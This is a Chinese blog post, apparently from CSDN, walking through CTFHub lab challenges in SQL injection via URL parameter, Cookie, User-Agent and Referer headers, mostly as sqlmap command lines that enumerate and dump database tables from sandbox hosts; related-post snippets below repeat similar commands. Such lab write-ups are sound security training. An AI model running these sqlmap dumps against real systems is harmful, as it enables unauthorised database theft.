sqlmap使用:ctfhub靶场查询SQL注入+查询Cookie注入+查询UA注入+Refer注入

已于 2023-07-20 20:20:56 修改
阅读量522 收藏 7
点赞数 1
分类专栏: 渗透 文章标签: 数据库
于 2023-07-20 17:12:49 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/NSQ0207/article/details/131833294
版权

一、ctfhub靶场查询SQL注入

1.在ctfhub靶场测试sql注入

 2.以上注入都是flag表,flag字段,最后提交的为flag字段里面的内容

3. 存在SQL注入

 4.已知数据库,表,字段,直接使用语句

 python sqlmap.py -u http://challenge-fb5fd3a370bee491.sandbox.ctfhub.com:10800/?id=1 -D sqli -T flag -C flag --dump

二、查询Cookie的SQL注入

 1.登入网站

 2.brup抓包

 3.创建文档,粘贴抓到的包

 4.给cookie添加 * ,指定查询该位置是否有SQL注入

 5.sqlmap查询是否存在SQL注入(也可以使用level -2)

 6.存在SQL注入

 7.查询数据

(1)查询数据库

python sqlmap.py -r C:\Users\南倾\Desktop\123.txt --dbs

(2)查询表

python sqlmap.py -r C:\Users\南倾\Desktop\123.txt -D sqli --tables

(3)查询表中的字段

python sqlmap.py -r C:\Users\南倾\Desktop\123.txt -D sqli -T rnfsjjhfwr --columns

(4)查询字段的内容 

python sqlmap.py -r C:\Users\南倾\Desktop\123.txt -D sqli -T rnfsjjhfwr -C syfgashivy --dump

8.提交flag

 三、查询UA注入

使用level 3

python sqlmap.py -u http://challenge-edfa242f9ea40435.sandbox.ctfhub.com:10800 -level 3

 python sqlmap.py -u http://challenge-edfa242f9ea40435.sandbox.ctfhub.com:10800 -level 3 --dbs

 python sqlmap.py -u http://challenge-edfa242f9ea40435.sandbox.ctfhub.com:10800 -level 3 -D sqli --tables

python sqlmap.py -u http://challenge-edfa242f9ea40435.sandbox.ctfhub.com:10800 -level 3 -D sqli -T  suigzvbmzy --columns

 python sqlmap.py -u http://challenge-edfa242f9ea40435.sandbox.ctfhub.com:10800 -level 3 -D sqli -T  suigzvbmzy -C qenrtsitoa --dump

四、Refer注入

python sqlmap.py -u http://challenge-4b50bf1e554f8e79.sandbox.ctfhub.com:10800 -level 3

python sqlmap.py -u http://challenge-4b50bf1e554f8e79.sandbox.ctfhub.com:10800 -level 3 --dbs 

 python sqlmap.py -u http://challenge-4b50bf1e554f8e79.sandbox.ctfhub.com:10800 -level 3 -D sqli --tables

python sqlmap.py -u http://challenge-8034e37eb0d94c95.sandbox.ctfhub.com:10800 -level 3 -D sqli -T ayvupotdny --columns

python sqlmap.py -u http://challenge-8034e37eb0d94c95.sandbox.ctfhub.com:10800 -level 3 -D sqli -T ayvupotdny -C fhraxdpwyt --dump

 

Serein_NSQ
关注
  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqlmap笔记
m0_47599604的博客
03-13 537
SQLmap简介与配置 SQLMAP的强大之处在于对数据库指纹的识别、数据库枚举、数据库提取、访问目标文件系统、并在获取完全的操作权限时执行任意命令,他支持以下几种独特的输入: 基于布尔类型的注入,即可根据返回页面判断条件真假的注入; 基于时间的盲注,即不能根据页面返回判断的时候,利用时间线是否延时来判断条件的真假; 基于报错的注入,即页面会返回错误信息,或者把注入的语句的结果直接返回到页面中,比如数据库报错的信息等; 联合查询注入,即可以使用union的情况下注入; 堆叠查询注入,即可以..
WEB攻防-通用漏洞&SQL注入-sqlmap基本使用&墨者靶场
m0_65336233的博客
10-09 1664
WEB攻防-通用漏洞&SQL注入
SQL注入15】自动化注入技术(基于sqlmap工具和sqli-labs-less1靶场平台)
Fighting_hawk的博客
02-22 4265
1. SQLMAP很自动化,能极大提高工作效率; 2. 掌握SQLMAP的常用命令; 3. 通过SQLMAP自动化运行过程代码,加深对注入原理的理解。
SQL注入工具sqlmap安装使用详解&靶场实验
05-14 753
SQL注入工具sqlmap安装使用详解&靶场实验,还有SQL注入攻击流程和MySQL攻击思路解读。
CTFHUB|SQL注入sqlmap
m0_60651303的博客
07-14 1182
差不多学了4天的SQL手工注入,学习一下sqlmap使用,用工具偷偷懒。但等级越高,其速度越慢。一定要在时间内跑出来,要不然过期了就跑不出来了。1、顾名思义,要拿到cookie值。2、需要设置level至少为2。UA注入用--level 3。2、找数据库里面的表。4、爆破列里面的内容。过程中都会有五个选择。
CTF-web 第十二部分 sqlmap专题
iamsongyu的博客
11-25 2360
  sqlmap开源又功能强大的工具,支持现在几乎所有的数据库,比国内的任何工具都强。支持get,post ,cookie注入。可以添加cookie和user-agent 支持盲注,错误回显注入,还有其他多种注入方法。 支持代理, 优化算法,更高效, 指纹识别技术判断数据库。   当给sqlmap这么一个url (http://192.168.136.131/sqlmap/mysql/get_...
漏洞防范:搭建漏洞靶场DVWA,DVWA之SQL注入漏洞,利用sqlmap把复杂的程序自动化
weixin_52371314的博客
10-12 1906
sql注入漏洞
SQL手工注入大全:包含各种类型的SQL注入,实现手工注入的乐趣,此资源你值得拥有。
05-31
宽字节注入、SQL手工注入漏洞测试(Oracle数据库)、SQL手工注入漏洞测试(...SQL注入漏洞测试(参数加密)、SQL手工注入漏洞测试(MySQL数据库)、SQL注入漏洞测试(delete注入)、SQL过滤字符后手工注入漏洞测试、延时注入...
java开发基于SQLmapSQL注入工具源码.zip
06-01
基于SQLmapSQL注入工具源码.。基于SQLmap使用Java开发 安装教程 安装JDK(需要有javafx) 安装Python 安装SQLmap 基于SQLmapSQL注入工具源码.。基于SQLmap使用Java开发 安装教程 安装JDK(需要有javafx)...
使用sqlmap+burpsuite进行中级sql注入
06-01
在网络安全领域,SQL注入是一种常见的攻击手段,通过利用应用程序对用户输入数据的不恰当处理,攻击者可以操纵SQL查询,获取、修改、删除数据库中的敏感信息。本篇将详细介绍如何结合sqlmap和BurpSuite工具进行中级...
sqlmap sql 注入测试工具
03-06
- 技术细节:SQLMap会尝试各种注入技术,包括但不限于ORDER BY注入、UNION SELECT注入、堆叠查询注入等,以找到最有效的注入点。 4. 安全测试流程: - 预备阶段:了解目标网站的结构,确定可能的注入点。 - 扫描...
sql注入工具sqlmap
06-16
sqlmap是一个自动化的sql注入渗透工具,指纹检测、注入方式、注入成功后的取数据等等都是自动化的,甚至还提供了一个字典来将取回来的hash爆破,是ctf sql注入题的必备帮手
CTF题目 [成绩查询 - Bugku CTF]union注入sqlmap的入门使用,两种方法一道题
最新发布
07-16
CTF题目 [成绩查询 - Bugku CTF]union注入sqlmap的入门使用,两种方法一道题。题目地址:https://ctf.bugku.com/challenges/detail/id/84.html?id=84&page=8 这道题可以有效的锻炼union注入sqlmap的入门操作,...
使用sqlmap注入(学校靶机)
qq_45808536的博客
09-10 4201
使用sqlmap注入 一.先判断网站的注入点:寻找与数据库交互的地方 原网站:http://117.167.136.244:28019/index/narticle.php?nid=3100 判断是否存在注入点:更改后面的数字,看看是否和原网站相同,如果不同,表示存在注入点 二,把网站扔进sqlmap里` python sqlmap.py -u"http://117.167.136.244:28019/index/narticle.php?nid=3100" 三,爆出所有数据库 python sqlmap
【笔记】使用Sqlmap对目标站点进行渗透攻击【基础实验】
小渣渣的博客
05-10 1713
使用Sqlmap对目标站点进行渗透攻击 使用kali Linux环境中的sqlmap实现对目标靶机网站的注入猜解。 打开测试站点DVWA的主页面,并设置安全级别为low 单击左边的SQL Injection,打开如下图所示界面在User ID框中输入任意数字。 输入123456,运用burpsuite抓到的数据包如下: 在kali linux虚拟机的命令行状态下运行Sqlmap,并输入语句 ...
CTFHub技能树 Web-SQL注入详解
千寻的博客
11-21 1975
所谓SQL注入就是用户在能够控制SQL查询、更新、插入、删除等语句的参数的情况下,攻击者通过构造特殊的输入字符串使后端程序错误地识别SQL查询语句中的代码与数据部分从而导致数据库管理系统输出了非预期的结果的一种行为。
关于ctfhubcookie注入方法之sqlmap自动注入
m0_62819604的博客
10-23 679
首先,我们可以使用burpsuite进行抓包。 如图所示,可以发现注入点为id=1。 然后我们可以使用kali linux里的sqlmap自动注入。 首先查询数据库名称sqlmap -u "http://challenge-593b577518b0da97.sandbox.ctfhub.com:10800/" --cookie "id=1" --level 2 --dbs 发现数据库为sqli 然后查询数据库sqlmap -u "http://challenge-593b57751..
CTFHub SQl注入 时间盲注(sqlmap
赤城封雪的博客
08-07 4988
CTFHub SQl注入 时间盲注(sqlmap) 0x00 简单介绍 这篇文章主要通过 CTFHub 时间盲注案例简单记录一下 sqlmap使用流程。 参考:sqlmap用户手册 | WooYun知识库 (xmd5.com) sqlmap 的功能: 1、判断可注入的参数 2、判断可以用那种SQL注入技术来注入 3、识别出哪种数据库 4、根据用户选择,读取哪些数据 (具体过程可见文章末尾案例) sqlmap支持五种不同的注入模式: 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 2
Access注入cookie注入(含靶场练习)
weixin_60777183的博客
08-31 636
一.cookie注入简介 Access → 数据库的一种。除了Access,还有mysql,mssql(sql server),Oracle等 cookie注入→特殊的传参方式产生的注入。所以cookie注入只跟传参方式有关,跟别的一概没有关系。 什么是CookieCookie是代表身份信息的一串字符串,网站根据Cookie来识别你是谁,如果获取了管理员的Cookie,可以无需密码直接登录管理员的账号。类似门禁卡、身份证。 二.怎么修改cookie 1.方法一:浏览器修改(不推荐) 浏..
UA注入 sqlmap
07-31
UA注入是一种常见的Web应用程序漏洞,它利用了用户代理(User-Agent)字段中的恶意输入来执行SQL注入攻击。通过在User-Agent字段中注入恶意的SQL语句,攻击者可以绕过应用程序的输入验证,直接与数据库进行交互,并获取敏感信息或者修改数据库内容。 为了利用UA注入漏洞,可以使用sqlmap工具。根据引用[1]和引用[2]提供的信息,可以使用以下命令来执行UA注入SQL注入攻击: 1. 使用level 3的参数来指定注入的等级:python2 sqlmap.py -u http://challenge-81256235c2233d23.sandbox.ctfhub.com:10080/ --level 3 --dbs 2. 使用-D参数指定数据库名称,-T参数指定表名,--columns参数列出所有字段:python2 sqlmap.py -u http://challenge-81256235c2233d23.sandbox.ctfhub.com:10080/ --level 3 -D sqli -T asqmhkqrnf --columns --dump ***

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值